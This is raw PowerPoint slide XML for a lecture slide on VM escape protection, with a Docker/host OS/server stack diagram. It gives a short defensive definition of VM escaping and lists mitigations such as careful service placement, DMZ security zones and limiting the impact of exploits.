                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1370"/>
                        </a:spcBef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Docker</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-8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400" spc="-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Eng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i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ne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73990">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="53975">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="27AD5F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89026">
                <a:tc gridSpan="8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Host</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1400" spc="-8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OS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82245">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="53975">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="004E7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80644">
                <a:tc gridSpan="8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65"/>
                        </a:spcBef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Server</a:t>
                      </a:r>
                      <a:endParaRPr sz="14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73355">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="4279A0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="39405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1" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11628881" y="4924805"/>
            <a:ext cx="494030" cy="1691639"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="494029" h="1691640">
                <a:moveTo>
                  <a:pt x="493775" y="1691640"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="415722" y="1689542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347947" y="1683703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294509" y="1674796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246888" y="1650492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246888" y="948563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234305" y="935554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199266" y="924258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145828" y="915351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78053" y="909512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="907415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78053" y="905317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145828" y="899478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199266" y="890571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234305" y="879275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246888" y="866267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246888" y="41148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259470" y="28139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294509" y="16843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347947" y="7936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415722" y="2097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="493775" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="004E7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1113110" y="5066558"/>
            <a:ext cx="405765" cy="1408430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="3111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dirty="0" sz="2200" spc="80" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Container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03696" y="306451"/>
            <a:ext cx="384873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310">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escape</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protection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36691" y="760476"/>
            <a:ext cx="5254752" cy="36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520952" y="6181344"/>
            <a:ext cx="4267200" cy="1697989"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4267200" h="1697990">
                <a:moveTo>
                  <a:pt x="0" y="282955"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3705" y="237074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14431" y="193543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31594" y="152948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54612" y="115872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82899" y="82899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115872" y="54612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152948" y="31594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193543" y="14431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237074" y="3705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282955" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3984244" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4030125" y="3705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4073656" y="14431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4114251" y="31594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4151327" y="54612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4184300" y="82899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4212587" y="115872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4235605" y="152948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4252768" y="193543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4263494" y="237074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4267200" y="282955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4267200" y="1414779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4263494" y="1460661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4252768" y="1504192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4235605" y="1544787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4212587" y="1581863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4184300" y="1614836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4151327" y="1643123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4114251" y="1666141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4073656" y="1683304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4030125" y="1694030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3984244" y="1697735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282955" y="1697735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237074" y="1694030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193543" y="1683304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152948" y="1666141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115872" y="1643123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82899" y="1614836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54612" y="1581863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31594" y="1544787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14431" y="1504192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3705" y="1460661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1414779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="282955"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12700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291842" y="6596888"/>
            <a:ext cx="2611120" cy="79057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dirty="0" sz="2200" spc="-13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reduces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impact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endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="57785">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
            </a:pP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successful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exploits.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684520" y="3075432"/>
            <a:ext cx="4810125" cy="1572895"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4810125" h="1572895">
                <a:moveTo>
                  <a:pt x="0" y="262127"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4222" y="215007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16398" y="170658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35785" y="129822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61645" y="93237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93237" y="61645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129822" y="35785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170658" y="16398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="215007" y="4222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262127" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4547615" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4594736" y="4222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4639085" y="16398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4679921" y="35785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4716506" y="61645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4748098" y="93237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4773958" y="129822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4793345" y="170658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4805521" y="215007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4809744" y="262127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4809744" y="1310639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4805521" y="1357760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4793345" y="1402109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4773958" y="1442945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4748098" y="1479530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4716506" y="1511122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4679921" y="1536982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4639085" y="1556369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4594736" y="1568545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4547615" y="1572767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262127" y="1572767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="215007" y="1568545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170658" y="1556369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129822" y="1536982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93237" y="1511122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61645" y="1479530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35785" y="1442945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16398" y="1402109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4222" y="1357760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1310639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="262127"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="E3B36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217547" y="1882292"/>
            <a:ext cx="11815445" cy="25279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64560" marR="5080" indent="-3452495">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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VM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escaping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3E3E3E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malware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that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runs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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>guest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10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OS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and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jumps</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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to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another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host.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Some</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-68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features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VM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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escape</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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protection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are: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950">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="3547110" marR="3725545">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc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ens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car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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ful</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>placement</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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VM  </a:t>
            </a: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ser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v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ices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on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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ho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st</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E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3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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E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120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with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15">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>network.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329671" y="6181344"/>
            <a:ext cx="4488180" cy="1697989"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4488180" h="1697990">
                <a:moveTo>
                  <a:pt x="0" y="282955"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3705" y="237074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14431" y="193543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31594" y="152948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54612" y="115872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82899" y="82899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115872" y="54612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152948" y="31594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193543" y="14431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237074" y="3705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282955" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4205224" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4251105" y="3705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294636" y="14431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335231" y="31594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4372307" y="54612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4405280" y="82899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4433567" y="115872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4456585" y="152948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4473748" y="193543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4484474" y="237074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4488180" y="282955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4488180" y="1414779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4484474" y="1460661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4473748" y="1504192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4456585" y="1544787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4433567" y="1581863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4405280" y="1614836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4372307" y="1643123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335231" y="1666141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294636" y="1683304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4251105" y="1694030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4205224" y="1697735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282955" y="1697735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237074" y="1694030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193543" y="1683304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152948" y="1666141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115872" y="1643123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82899" y="1614836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54612" y="1581863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31594" y="1544787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14431" y="1504192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3705" y="1460661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1414779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="282955"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="E9AEA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0960100" y="6596888"/>
            <a:ext cx="3300095" cy="79057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70"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>respects</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>zones</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(DMZ).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599176" y="4503420"/>
            <a:ext cx="4998720" cy="3709670"/>
            <a:chOff x="5599176" y="4503420"/>
            <a:chExt cx="4998720" cy="3709670"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5599176" y="5789676"/>
              <a:ext cx="2421890" cy="2423160"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2421890" h="2423159">
                  <a:moveTo>
                    <a:pt x="1175639" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1128129" y="2154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1081116" y="6122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034634" y="11869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="988716" y="19362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="943397" y="28566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="898712" y="39447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854694" y="51970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="811378" y="66101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="768798" y="81806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="726989" y="99050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685984" y="117800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645818" y="138020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606525" y="159678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568139" y="182738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530696" y="207165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="494228" y="232927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458771" y="259988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424358" y="288315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391025" y="317873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358804" y="348627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327731" y="380543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297839" y="413588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269163" y="447727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241738" y="482925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215597" y="519148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190775" y="556363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167305" y="594534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145224" y="633627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124563" y="673609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105359" y="714444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87645" y="756099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71455" y="798540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56824" y="841731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43785" y="885639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32374" y="930229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22625" y="975468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14571" y="1021320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8247" y="1067752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3688" y="1114729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927" y="1162218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1210183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="957" y="1258960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3807" y="1307249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8512" y="1355014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15038" y="1402219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23348" y="1448826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33407" y="1494800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45178" y="1540104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58627" y="1584703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73718" y="1628559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90414" y="1671637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108680" y="1713901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128481" y="1755314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149780" y="1795840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172541" y="1835442"/>
                  </a:lnTo>
